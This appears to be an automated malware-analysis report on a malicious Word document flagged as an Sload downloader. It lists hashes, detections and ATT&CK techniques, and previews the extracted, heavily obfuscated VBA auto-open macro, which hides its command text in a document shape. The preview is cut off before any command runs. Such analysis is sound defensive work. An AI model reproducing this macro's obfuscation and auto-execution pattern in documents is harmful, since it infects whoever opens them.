Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aef352b338ec1651…

MALICIOUS

Office (OLE)

Size: 140.6 KB
Created: 2018-11-29 07:17:00
Authoring application: Microsoft Office Word
First seen: 2019-01-12
MD5: 5787baba8956f5a3f04e0632ec06b6b6
SHA-1: 3ca9ddf76ee96f17e67414fbaf05d2ba6c3dbe75
SHA-256: aef352b338ec165156c57569386f24e9c90e82eb2ee9a4b8fe72500cb00f6e54
Risk score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro that executes a Document_Open auto-execution routine. This routine is designed to download and execute a second-stage payload using obfuscated PowerShell commands. The reconstructed PowerShell command includes multiple URLs, suggesting a downloader functionality. The ClamAV detection 'Doc.Downloader.Sload-6799025-0' further supports this assessment.

Heuristics 6

  • ClamAV: Doc.Downloader.Sload-6799025-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sload-6799025-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  7058 bytes
SHA-256: 0f8b86af31e902f14cfa07e0a12e778f14510e8f7e8ac5c36d4c34815ed85462
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "UYbPCcFPJZvaFI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   On Error Resume Next
      ijGNzKO = (wsKJOTFqa - Oct(RPztJGn) * PWBLHPV - Sgn(313530499) - 209636702 + Fix(qKlbiGKn) + 1451831359 + 229791649 / 305146697 / suEqDXdoW)
      Select Case aXvrumlvo
         Case 122503343
            RAQsphqj = CLng(145217894)
            EfUiHGQL = Int(RrSrjOjqM)
         Case 159802944
            bubHb = Hex(303762076)
            wNqnFAOV = CStr(286994330 * CByte(NnfUjqA))
End Select
   On Error Resume Next
      JZNDlj = (KhfTHDN - Oct(SmSGd) * bbLzt - Sgn(49388683) - 137235888 + Fix(kYBjrTzfi) + 369337239 + 131574510 / 30173373 / uGnMBmFcu)
      Select Case FKLhwBFs
         Case 184830645
            TwGRY = CLng(76179982)
            EnHMmYChV = Int(ksUPOqn)
         Case 315897501
            jlBdYNr = Hex(20172430)
            zzWnptBp = CStr(253828580 * CByte(TlIAcdU))
End Select
Set mEGTV = Shapes("dYIZNpSu")
   On Error Resume Next
      XfCFtMHV = (JimJEwr - Oct(BJsoQuAo) * XlTRX - Sgn(216258471) - 102604055 + Fix(tvpaH) + 1763785239 + 15921856 / 108747270 / VYmOLp)
      Select Case RaNErHl
         Case 12032716
            opVBLm = CLng(329769239)
            FLACOui = Int(YvYbCpLwu)
         Case 2528071
            TKMlKnKSl = Hex(214460818)
            IjaPJA = CStr(267215709 * CByte(CjiOTLM))
End Select
   On Error Resume Next
      JYXYb = (SRkOaq - Oct(zztAIJ) * CCqwFkPkJ - Sgn(92857578) - 336355596 + Fix(HsjBZp) + 1350294559 + 334460696 / 273252221 / WiSFnQbEH)
      Select Case vqCHhbSqD
         Case 218268229
            WOPiX = CLng(108536855)
            TLoKAMjHd = Int(wzJEG)
         Case 62418876
            QqbUwW = Hex(194670473)
            IizTDWPzi = CStr(245458497 * CByte(BkqpbazRt))
End Select
fQkjDIsXL = "" + ihziTJI + QFzSh + VoKPsij + AAtAFjq + mEGTV.TextFrame.TextRange.Text + nMEtiG + jODEiLB + qVzLv + rjojVj + HwwZWa
   On Error Resume Next
      kPAmQt = (wswDhNq - Oct(MKYAqar) * sHfGjzzp - Sgn(52620842) - 333137609 + Fix(MjWWGiDl) + 1550828389 + 129592295 / 316259579 / iBZzBs)
      Select Case FnsiIil
         Case 257829077
            wsIvjYiwq = CLng(268894450)
            VmoURw = Int(wEGzzwitA)
         Case 128102088
            NrVrN = Hex(253728573)
            LAdJXaH = CStr(85413440 * CByte(HSwYNLj))
End Select
   On Error Resume Next
      mQBTI = (NzRLJdBM - Oct(cGucEIWa) * YlXzJn - Sgn(276889039) - 16945576 + Fix(LKZLf) + 294764989 + 83055854 / 42014 / wEVadw)
      Select Case PchQNvQ
         Case 276190258
            vXRQndVG = CLng(155970854)
            CNQbpPErX = Int(wzHYUuL)
         Case 55964035
            sPtjckhv = Hex(235851819)
            VjPDnvP = CStr(333849654 * CByte(rAJEs))
End Select
   On Error Resume Next
      PAJMRn = (GLziKB - Oct(bkzlXAWEl) * Tubklmtmn - Sgn(172829211) - 111242294 + Fix(IHmIrjGr) + 1004325359 + 302412089 / 97001199 / wIWsu)
      Select Case nKPSsXL
         Case 193795390
            YFvXahn = CLng(189117616)
            wPImwtaZf = Int(ldQBrSm)
         Case 39757254
            pOPwOPi = Hex(248650586)
            WnVKff = CStr(301034520 * CByte(LBMVsSso))
End Select
   On Error Resume Next
      Kijpq = (hGCwQqzJv - Oct(wPIPzErR) * dzPlWIpU - Sgn(246134572) - 333126721 + Fix(FtVKiijU) + 2541624809# + 329240792 / 262027766 / aNbwfVLGq)
      Select Case JMrRUf
         Case 263152395
            VLKNcDu = CLng(328285405)
            QUXiipFo = Int(vLKwasr)
         Case 275152899
            ISRODjLc = Hex(185182104)
            NkXBhpvl = CStr(130551849 * CByte(bXlcwkcQ))
End Select
   On Error Resume Next
      jGQRABEGK = (tPXPIapPV - Oct(OFHLdCUBN) * rtjELhl - Sgn(278183966) - 211306046 + Fix(YjYIq) + 1629483079 + 90985018 / 321661499 / DaOHwhd)
      Select Case FowjCspwz
... (truncated)